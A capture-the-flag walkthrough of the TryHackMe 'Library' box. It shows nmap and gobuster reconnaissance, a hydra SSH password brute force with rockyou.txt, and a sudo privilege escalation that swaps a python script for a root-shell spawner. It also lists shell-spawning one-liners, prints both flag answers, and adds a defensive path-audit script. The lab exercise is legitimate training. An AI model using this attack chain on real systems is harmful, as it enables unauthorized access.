Library Walkthrough — Tryhackme

G N Vivekananda
May 28, 2021

Dear friends, let us solve the challenges in the Library box at the link below.

1. Start the VPN you have downloaded and deploy the TryHackMe machine first. Ping and check the We need to run an Nmap scan against the machine to know which ports are open and which services are running on those ports. I am going to use an aggressive Nmap scan. The scan shows that ports 22, 80, 139 and 445 are open.

nmap -sS -sV -A -O 10.10.64.71

2. Run gobuster to check for hidden folders and directories.

gobuster dir -u http://10.10.64.71/ -w /usr/share/wordlists/dirb/common.txt

3. Checking the results generated by gobuster: http://10.10.64.71/robots.txt gives the results below. It may be a hint to use rockyou.txt.

4. When we opened the provided IP, 10.10.64.71, as the URL in the browser, we found the writer of the blog, as shown below.

5. Assuming the user is meliodas, try brute-forcing the login for meliodas using the hydra tool. In the gobuster search we got robots.txt, which gave a hint to use rockyou. We will use the dictionary "rockyou.txt" to brute-force the login of meliodas.

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.64.71

6. We got the login meliodas and the password iloveyou1 from the brute-force search. Let's try to log into the target machine with these credentials.

ssh meliodas@10.10.64.71

Now we are inside meliodas's SSH shell. Let's capture the user flag. With the ls command, we can see the list of files present: we have access as the user and can see two files. We now have the first flag of this machine!

7. Now, to capture the root flag, we need root access. First and foremost, let us see which commands the user can run with sudo. The user can only use sudo python on the bak.py file. Next, check the permissions of bak.py and the content inside it.

sudo -l

8. I guess we can't do anything with the script itself because it is write-protected. Since our only sudo privilege is executing bak.py with python, how about deleting the existing bak.py and creating a new one?

cp bak.py bak.py.org

rm /home/meliodas/bak.py

9. Let us create a new file that allows us to spawn a root shell. Let us use GTFOBins for spawning shells and pick a suitable one from the list below.

During pen tests, you may often obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Some of this will depend on the system environment and installed packages.

Shell Spawning

python -c 'import pty; pty.spawn("/bin/sh")'

echo os.system('/bin/bash')

/bin/sh -i

perl -e 'exec "/bin/sh";'

perl: exec "/bin/sh";

ruby: exec "/bin/sh"

lua: os.execute('/bin/sh')

  • (From within IRB)

exec "/bin/sh"

  • (From within vi)

:!bash

  • (From within vi)

:set shell=/bin/bash:shell

  • (From within nmap)

!sh

Many of these will also allow you to escape jail shells. The top 3 would be my most successful in general for spawning from the command line.

We used the first one-liner: we wrote it into the newly created bak.py file and ran it with sudo for root access.

echo 'import pty; pty.spawn("/bin/sh")' > bak.py

sudo python /home/meliodas/bak.py

id

whoami

10. Eureka! We got root access. We can now capture the root flag. Let us find the root flag in its directory.

ls

cd /root

ls
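Steps 8 to 10 work because the write-protected bak.py sits in meliodas's home directory, where the user can delete and recreate it. The check below is an added example, not part of the original walkthrough or the box: it walks a sudo-allowed script path and reports every component a non-root account could replace. The uid 1000, the file modes and the /usr/local/sbin, /tmp and /opt locations are constructed assumptions.

```python
import os
import stat
from collections import namedtuple

def replaceable_components(path, trusted_uids=(0,), stat_fn=os.stat):
    """Return [(component, reason)] for each part of an absolute, symlink-free
    path that an account outside trusted_uids could modify or swap out."""
    findings = []
    current = os.path.abspath(path)
    while True:
        st = stat_fn(current)
        if st.st_uid not in trusted_uids:
            # The owner can always chmod, so read-only mode bits do not help.
            findings.append((current, "owned by uid %d" % st.st_uid))
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            # Sticky directories (like /tmp) only let an entry's owner remove it.
            sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
            if not sticky_dir:
                findings.append((current, "group/world-writable"))
        parent = os.path.dirname(current)
        if parent == current:  # reached "/"
            return findings
        current = parent

# Constructed sample metadata (uid 1000 and all modes are assumptions).
FakeStat = namedtuple("FakeStat", "st_mode st_uid")
D, F = stat.S_IFDIR, stat.S_IFREG
SAMPLE = {
    "/": FakeStat(D | 0o755, 0),
    "/home": FakeStat(D | 0o755, 0),
    "/home/meliodas": FakeStat(D | 0o755, 1000),
    "/home/meliodas/bak.py": FakeStat(F | 0o444, 0),  # write-protected file
    "/usr": FakeStat(D | 0o755, 0),
    "/usr/local": FakeStat(D | 0o755, 0),
    "/usr/local/sbin": FakeStat(D | 0o755, 0),
    "/usr/local/sbin/bak.py": FakeStat(F | 0o444, 0),
    "/tmp": FakeStat(D | 0o1777, 0),
    "/tmp/bak.py": FakeStat(F | 0o644, 0),
    "/opt": FakeStat(D | 0o777, 0),
    "/opt/bak.py": FakeStat(F | 0o644, 0),
}

def audit_sample(path):
    """Audit a path against the constructed SAMPLE table instead of the disk."""
    return replaceable_components(path, stat_fn=SAMPLE.__getitem__)

if __name__ == "__main__":
    for p in ("/home/meliodas/bak.py", "/usr/local/sbin/bak.py"):
        print(p, audit_sample(p) or "ok")
```

Called with the default stat_fn, replaceable_components reads real metadata from disk; an empty result means only root can change what the sudo rule executes.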

Done! Let us see the answers to the challenge questions now.

  1. User flag

6d488cbb3f111d135722c33cb635f4ec

2. Root flag

e8c8c6c256c35515d1d344ee0488c617

Thank you very much for reading. I hope you find this useful, and if there is something you would like to add or any suggestions, you can contact me anytime.

Happy Hacking!
